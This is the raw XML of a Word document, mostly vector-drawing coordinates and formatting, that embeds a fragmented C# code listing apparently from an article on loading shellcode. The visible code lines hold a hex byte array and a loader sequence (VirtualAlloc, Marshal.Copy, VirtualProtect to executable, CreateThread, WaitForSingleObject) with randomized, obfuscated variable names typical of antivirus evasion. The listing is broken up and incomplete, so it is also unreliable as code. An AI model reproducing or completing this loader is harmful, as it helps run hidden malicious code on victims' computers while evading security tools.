5,3746,14175,3746,14175,3746,14175,3746,14175,3746,14175,3746,14174,3746,14174,3746,14174,3746,14173,3746,14173,3746,14173,3746,14172,3746,14172,3746,14172,3746,14171,3746,14171,3746,14170,3746,14170,3746,14169,3746,14168,3746,14168,3746,14167,3746,14166,3746,14166,3746,14165,3746,14164,3746,14163,3746,14162,3746,14161,3746,14160,3746,14159,3746,14158,3746,14157,3746,14156,3746,14155,3746,14154,3746,14152,3746,14151,3746,14150,3746,14148,3746,14147,3746,14145,3746,14143,3746,14142,3746,14140,3746,14138,3746,14136,3746,14135,3746,14133,3746,14131,3746,14129,3746,14126,3746,14124,3746,14122,3746,14120,3746,14117,3746,14115,3746,14112,3746,14110,3746,14107,3746,14104,3746,14101,3746,14099,3746,14096,3746,14093,3746,14090,3746,14086,3746,14083,3746,14080,3746,14076,3746,14073,3746,14069,3746,14066,3746,14062,3746,14058,3746,14054,3746,14050,3746,14046,3746,14042,3746,14038,3746,14034,3746,14029,3746,14025,3746,14020,3746,14015,3746,14011,3746,14006,3746,14001,3746,13996,3746,13991,3746,13985,3746,13980,3746,13975,3746,13969,3746,13963,3746,13958,3746,13952,3746,13946,3746,13940,3746,13934,3746,13927,3746,13921e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:198.500pt;margin-top:726.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3970,14530" coordsize="130,270">
        <v:shape style="position:absolute;left:3970;top:14530;width:130;height:270" coordorigin="3970,14530" coordsize="130,270" path="m3986,14551l3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3987,14551,3987,14551,3987,14551,3987,14551,3987,14551,3987,14551,3987,14551,3987,14551,3988,14551,3988,14551,3988,14551,3988,14551,3988,14551,3989,14551,3989,14551,3989,14551,3989,14551,3990,14551,3990,14551,3990,14551,3991,14551,3991,14551,3991,14551,3992,14551,3992,14551,3992,14551,3993,14551,3993,14551,3994,14551,3994,14551,3995,14551,3995,14551,3996,14551,3997,14551,3997,14551,3998,14551,3999,14551,3999,14551,4000,14551,4001,14551,4001,14551,4002,14551,4003,14551,4004,14551,4005,14551,4006,14551,4006,14551,4007,14551,4008,14551,4009,14551,4010,14551,4012,14551,4013,14551,4014,14551,4015,14551,4016,14551,4017,14551,4019,14551,4020,14551,4021,14551,4022,14551,4024,14551,4025,14551,4027,14551,4028,14551,4030,14551,4031,14551,4033,14551,4035,14551,4036,14551,4038,14551,4040,14551,4041,14551,4043,14551,4045,14551,4047,14551,4049,14551,4051,14551,4053,14551,4055,14551,4057,14551,4059,14551,4062,14551,4064,14551,4066,14551,4068,14551,4071,14551,4073,14551,4076,14551,4078,14551,4081,14551,4083,14551,4086,14551,4089,14551,4092,14551,4094,14551,4097,14551,4100,14551,4103,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14552,4106,14552,4106,14552,4106,14552,4106,14552,4106,14552,4106,14552,4106,14552,4106,14552,4106,14553,4106,14553,4106,14553,4106,14553,4106,14553,4106,14554,4106,14554,4106,14554,4106,14555,4106,14555,4106,14555,4106,14556,4106,14556,4106,14557,4106,14557,4106,14558,4106,14558,4106,14559,4106,14560,4106,14560,4106,14561,4106,14562,4106,14563,4106,14563,4106,14564,4106,14565,4106,14566,4106,14567,4106,14568,4106,14569,4106,14570,4106,14571,4106,14573,4106,14574,4106,14575,4106,14577,4106,14578,4106,14579,4106,14581,4106,14582,4106,14584,4106,14586,4106,14587,4106,14589,4106,14591,4106,14593,4106,14595,4106,14597,4106,14599,4106,14601,4106,14603,4106,14606,4106,14608,4106,14610,4106,14613,4106,14615,4106,14618,4106,14620,4106,14623,4106,14626,4106,14629,4106,14632,4106,14635,4106,14638,4106,14641,4106,14644,4106,14648,4106,14651,4106,14655,4106,14658,4106,14662,4106,14665,4106,14669,4106,14673,4106,14677,4106,14681,4106,14685,4106,14690,4106,14694,4106,14698,4106,14703,4106,14707,4106,14712,4106,14717,4106,14722,4106,14727,4106,14732,4106,14737,4106,14742,4106,14747,4106,14753,4106,14758,4106,14764,4106,14770,4106,14776,4106,14782,4106,14788,4106,14794,4106,14800,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4106,14806,4105,14806,4105,14806,4105,14806,4105,14806,4105,14806,4105,14806,4105,14806,4105,14806,4105,14806,4104,14806,4104,14806,4104,14806,4104,14806,4104,14806,4103,14806,4103,14806,4103,14806,4102,14806,4102,14806,4102,14806,4102,14806,4101,14806,4101,14806,4100,14806,4100,14806,4100,14806,4099,14806,4099,14806,4098,14806,4098,14806,4097,14806,4097,14806,4096,14806,4095,14806,4095,14806,4094,14806,4094,14806,4093,14806,4092,14806,4091,14806,4091,14806,4090,14806,4089,14806,4088,14806,4087,14806,4087,14806,4086,14806,4085,14806,4084,14806,4083,14806,4082,14806,4081,14806,4079,14806,4078,14806,4077,14806,4076,14806,4075,14806,4074,14806,4072,14806,4071,14806,4070,14806,4068,14806,4067,14806,4065,14806,4064,14806,4062,14806,4061,14806,4059,14806,4058,14806,4056,14806,4054,14806,4052,14806,4051,14806,4049,14806,4047,14806,4045,14806,4043,14806,4041,14806,4039,14806,4037,14806,4035,14806,4033,14806,4030,14806,4028,14806,4026,14806,4024,14806,4021,14806,4019,14806,4016,14806,4014,14806,4011,14806,4009,14806,4006,14806,4003,14806,4001,14806,3998,14806,3995,14806,3992,14806,3989,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14806,3986,14805,3986,14805,3986,14805,3986,14805,3986,14805,3986,14804,3986,14804,3986,14804,3986,14803,3986,14803,3986,14803,3986,14802,3986,14802,3986,14801,3986,14801,3986,14801,3986,14800,3986,14799,3986,14799,3986,14798,3986,14797,3986,14797,3986,14796,3986,14795,3986,14794,3986,14794,3986,14793,3986,14792,3986,14791,3986,14790,3986,14789,3986,14788,3986,14786,3986,14785,3986,14784,3986,14783,3986,14781,3986,14780,3986,14778,3986,14777,3986,14775,3986,14774,3986,14772,3986,14770,3986,14769,3986,14767,3986,14765,3986,14763,3986,14761,3986,14759,3986,14757,3986,14755,3986,14752,3986,14750,3986,14748,3986,14745,3986,14743,3986,14740,3986,14737,3986,14735,3986,14732,3986,14729,3986,14726,3986,14723,3986,14720,3986,14717,3986,14713,3986,14710,3986,14707,3986,14703,3986,14700,3986,14696,3986,14692,3986,14689,3986,14685,3986,14681,3986,14677,3986,14673,3986,14668,3986,14664,3986,14660,3986,14655,3986,14650,3986,14646,3986,14641,3986,14636,3986,14631,3986,14626,3986,14621,3986,14616,3986,14610,3986,14605,3986,14599,3986,14594,3986,14588,3986,14582,3986,14576,3986,14570,3986,14564,3986,14558,3986,14551e x" fillcolor="#fefefe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0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30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0xf1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0xba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0x4c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0x77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0x26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0xd5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0x4c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0xea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x68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31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0xba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0x29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0x6b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0xd5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0x6a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x0a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32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0x5e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0x50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0x31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0x4d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0x31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0xc0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x89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33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0xba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0xea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0xdf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0xe0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xd5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34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0xc7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0x6a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0x10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0x4c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0xe2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xba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35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0x99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0xa5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0x74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0x61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0xd5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0xc0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0x74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0x0a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0xce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0x75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xe5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36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0xe8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0x93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0xec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0x10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0xe2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0x31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xc9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37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0x6a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0xba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0x02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0xd9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0xc8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xd5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38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0x7e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0xc4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0x20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0x5e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0xf6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0x6a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x41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39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0x68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0x10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0x58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0x31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x41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40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0xba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0xa4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0xe5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0xd5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0xc3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x31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41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0xda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0xf9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0xba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0xd9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xc8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42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0xd5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0x7d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0x28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0x59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0x68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x40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43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0x6a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0xba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0x0b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0x2f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0x0f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0x30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xd5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44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0xba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0x75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0x6e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0x61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0xd5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0xce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0xe9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x3c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45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0xc3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0x29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0x48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0x85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0xf6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0x75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0xb4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x41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46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0xe7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0x58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0x6a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0x59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0x49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0xc7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0xc2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0xf0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0xb5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0xa2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0x56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3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>xd5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}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="156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47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IntPtr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AmnGaO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VirtualAlloc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="12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UInt32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QWKpWKhcs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Length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0x3000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0x0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2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="2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3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48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Marshal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Copy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QWKpWKhcs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IntPtr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AmnGaO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QWKpWKhcs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Length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;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="136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z w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>49</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="22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IntPtr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oXmoNUYvivZlXj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="29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29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IntPtr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Zero</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;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UInt32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="29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XVXTOi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29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0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="29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IntPtr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pAeCTf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wBS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IntPtr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Zero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;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="141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50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uint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BnhanUiUJaetgy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="17"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="136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51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0076a9"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>bool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iSdNUQK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VirtualProtect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AmnGaO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uint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)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0x1000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uint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)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0x20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0076a9"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>out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B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nhanUiUJaetgy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;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2299" w:firstLine="-15"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>52</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="24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oXmoNUYvivZlXj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CreateThread</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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AmnGaO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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31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pAeCTfwBS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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ref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3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>XVXTOi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;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="156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53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WaitForSingleObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="19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oXmoNUYvivZlXj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="15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0xFFFFFFFF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="12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;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}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520.111pt;margin-top:0.0pt;width:0.0pt;height:69.509pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,1390">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:1390" coordorigin="10402,0" coordsize="0,1390" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,1,10402,1,10402,2,10402,2,10402,3,10402,4,10402,4,10402,5,10402,6,10402,7,10402,8,10402,10,10402,11,10402,12,10402,14,10402,16,10402,18,10402,20,10402,22,10402,24,10402,27,10402,29,10402,32,10402,35,10402,38,10402,41,10402,45,10402,48,10402,52,10402,56,10402,61,10402,65,10402,70,10402,75,10402,80,10402,85,10402,91,10402,97,10402,103,10402,109,10402,115,10402,122,10402,129,10402,137,10402,144,10402,152,10402,160,10402,169,10402,178,10402,187,10402,196,10402,206,10402,216,10402,226,10402,237,10402,248,10402,259,10402,271,10402,282,10402,295,10402,307,10402,320,10402,334,10402,348,10402,362,10402,376,10402,391,10402,406,10402,422,10402,438,10402,454,10402,471,10402,488,10402,506,10402,524,10402,543,10402,562,10402,581,10402,601,10402,621,10402,642,10402,663,10402,685,10402,707,10402,729,10402,752,10402,776,10402,800,10402,824,10402,849,10402,875,10402,901,10402,927,10402,954,10402,982,10402,1010,10402,1039,10402,1068,10402,1098,10402,1128,10402,1159,10402,1190,10402,1222,10402,1254,10402,1287,10402,1321,10402,1355,10402,1390e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:48.500pt;width:449.500pt;height:20.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,410">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:410" coordorigin="1490,970" coordsize="8990,410" path="m1510,999l1510,999,1510,999,1510,999,1510,999,1510,999,1510,999,1511,999,1512,999,1512,999,1514,999,1515,999,1517,999,1519,999,1521,999,1524,999,1528,999,1532,999,1536,999,1541,999,1546,999,1552,999,1559,999,1566,999,1575,999,1583,999,1593,999,1603,999,1615,999,1627,999,1640,999,1654,999,1668,999,1684,999,1701,999,1719,999,1738,999,1758,999,1780,999,1802,999,1826,999,1851,999,1877,999,1904,999,1933,999,1963,999,1995,999,2028,999,2063,999,2099,999,2136,999,2175,999,2216,999,2259,999,2303,999,2348,999,2396,999,2445,999,2496,999,2549,999,2604,999,2660,999,2719,999,2779,999,2841,999,2906,999,2972,999,3041,999,3112,999,3184,999,3259,999,3336,999,3416,999,3498,999,3582,999,3668,999,3757,999,3848,999,3941,999,4037,999,4136,999,4236,999,4340,999,4446,999,4555,999,4666,999,4780,999,4897,999,5017,999,5139,999,5264,999,5392,999,5523,999,5657,999,5793,999,5933,999,6076,999,6222,999,6370,999,6522,999,6677,999,6835,999,6997,999,7161,999,7329,999,7500,999,7675,999,7853,999,8034,999,8219,999,8407,999,8598,999,8793,999,8992,999,9194,999,9400,999,9609,999,9823,999,10039,999,10260,999,10484,999,10484,999,10484,999,10484,999,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1001,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1002,10484,1003,10484,1003,10484,1004,10484,1004,10484,1005,10484,1005,10484,1006,10484,1006,10484,1007,10484,1008,10484,1009,10484,1009,10484,1010,10484,1011,10484,1012,10484,1013,10484,1014,10484,1015,10484,1017,10484,1018,10484,1019,10484,1021,10484,1022,10484,1024,10484,1025,10484,1027,10484,1028,10484,1030,10484,1032,10484,1034,10484,1036,10484,1038,10484,1040,10484,1042,10484,1045,10484,1047,10484,1050,10484,1052,10484,1055,10484,1057,10484,1060,10484,1063,10484,1066,10484,1069,10484,1072,10484,1076,10484,1079,10484,1082,10484,1086,10484,1090,10484,1093,10484,1097,10484,1101,10484,1105,10484,1109,10484,1114,10484,1118,10484,1123,10484,1127,10484,1132,10484,1137,10484,1142,10484,1147,10484,1152,10484,1157,10484,1163,10484,1168,10484,1174,10484,1180,10484,1186,10484,1192,10484,1198,10484,1204,10484,1211,10484,1217,10484,1224,10484,1231,10484,1238,10484,1245,10484,1253,10484,1260,10484,1268,10484,1275,10484,1283,10484,1291,10484,1299,10484,1308,10484,1316,10484,1325,10484,1334,10484,1343,10484,1352,10484,1361,10484,1370,10484,1380,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10483,1390,10482,1390,10482,1390,10480,1390,10479,1390,10477,1390,10475,1390,10473,1390,10470,1390,10466,1390,10462,1390,10458,1390,10453,1390,10448,1390,10442,1390,10435,1390,10428,1390,10419,1390,10411,1390,10401,1390,10391,1390,10379,1390,10367,1390,10354,1390,10340,1390,10326,1390,10310,1390,10293,1390,10275,1390,10256,1390,10236,1390,10215,1390,10192,1390,10168,1390,10143,1390,10117,1390,10090,1390,10061,1390,10031,1390,9999,1390,9966,1390,9931,1390,9895,1390,9858,1390,9819,1390,9778,1390,9735,1390,9691,1390,9646,1390,9598,1390,9549,1390,9498,1390,9445,1390,9391,1390,9334,1390,9275,1390,9215,1390,9153,1390,9088,1390,9022,1390,8953,1390,8883,1390,8810,1390,8735,1390,8658,1390,8578,1390,8497,1390,8413,1390,8326,1390,8238,1390,8146,1390,8053,1390,7957,1390,7859,1390,7758,1390,7654,1390,7548,1390,7439,1390,7328,1390,7214,1390,7097,1390,6977,1390,6855,1390,6730,1390,6602,1390,6471,1390,6337,1390,6201,1390,6061,1390,5918,1390,5773,1390,5624,1390,5472,1390,5317,1390,5159,1390,4997,1390,4833,1390,4665,1390,4494,1390,4319,1390,4141,1390,3960,1390,3776,1390,3587,1390,3396,1390,3201,1390,3002,1390,2800,1390,2594,1390,2385,1390,2172,1390,1955,1390,1734,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1389,1510,1389,1510,1389,1510,1389,1510,1389,1510,1389,1510,1389,1510,1389,1510,1388,1510,1388,1510,1388,1510,1388,1510,1387,1510,1387,1510,1386,1510,1386,1510,1386,1510,1385,1510,1385,1510,1384,1510,1383,1510,1383,1510,1382,1510,1381,1510,1381,1510,1380,1510,1379,1510,1378,1510,1377,1510,1376,1510,1375,1510,1374,1510,1373,1510,1371,1510,1370,1510,1369,1510,1367,1510,1366,1510,1364,1510,1362,1510,1361,1510,1359,1510,1357,1510,1355,1510,1353,1510,1351,1510,1349,1510,1347,1510,1345,1510,1342,1510,1340,1510,1337,1510,1335,1510,1332,1510,1329,1510,1326,1510,1323,1510,1320,1510,1317,1510,1314,1510,1310,1510,1307,1510,1303,1510,1300,1510,1296,1510,1292,1510,1288,1510,1284,1510,1280,1510,1276,1510,1271,1510,1267,1510,1262,1510,1257,1510,1252,1510,1247,1510,1242,1510,1237,1510,1232,1510,1226,1510,1221,1510,1215,1510,1209,1510,1203,1510,1197,1510,1191,1510,1185,1510,1178,1510,1172,1510,1165,1510,1158,1510,1151,1510,1144,1510,1137,1510,1129,1510,1122,1510,1114,1510,1106,1510,1098,1510,1090,1510,1082,1510,1073,1510,1064,1510,1056,1510,1047,1510,1038,1510,1028,1510,1019,1510,1009,1510,999e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:68.500pt;width:449.500pt;height:0.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1370" coordsize="8990,10">
        <v:shape style="position:absolute;left:1490;top:1370;width:8990;height:10" coordorigin="1490,1370" coordsize="8990,10" path="m1510,1382l1510,1382,1510,1382,1510,1382,1510,1382,1510,1382,1510,1382,1511,1382,1512,1382,1512,1382,1514,1382,1515,1382,1517,1382,1519,1382,1521,1382,1524,1382,1528,1382,1532,1382,1536,1382,1541,1382,1546,1382,1552,1382,1559,1382,1566,1382,1575,1382,1583,1382,1593,1382,1603,1382,1615,1382,1627,1382,1640,1382,1654,1382,1668,1382,1684,1382,1701,1382,1719,1382,1738,1382,1758,1382,1780,1382,1802,1382,1826,1382,1851,1382,1877,1382,1904,1382,1933,1382,1963,1382,1995,1382,2028,1382,2063,1382,2099,1382,2136,1382,2175,1382,2216,1382,2259,1382,2303,1382,2348,1382,2396,1382,2445,1382,2496,1382,2549,1382,2604,1382,2660,1382,2719,1382,2779,1382,2841,1382,2906,1382,2972,1382,3041,1382,3112,1382,3184,1382,3259,1382,3336,1382,3416,1382,3498,1382,3582,1382,3668,1382,3757,1382,3848,1382,3941,1382,4037,1382,4136,1382,4236,1382,4340,1382,4446,1382,4555,1382,4666,1382,4780,1382,4897,1382,5017,1382,5139,1382,5264,1382,5392,1382,5523,1382,5657,1382,5793,1382,5933,1382,6076,1382,6222,1382,6370,1382,6522,1382,6677,1382,6835,1382,6997,1382,7161,1382,7329,1382,7500,1382,7675,1382,7853,1382,8034,1382,8219,1382,8407,1382,8598,1382,8793,1382,8992,1382,9194,1382,9400,1382,9609,1382,9823,1382,10039,1382,10260,1382,10484,1382e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:48.600pt;width:445.800pt;height:20.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId20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78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54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}</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:type w:val="continuous"/>
      <w:pgSz w:w="11920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	<Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/15.jpeg" />
	<Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/16.jpeg" />
	<Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/17.jpeg" />
	<Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/18.jpeg" />
	<Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/19.jpeg" />
	<Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/20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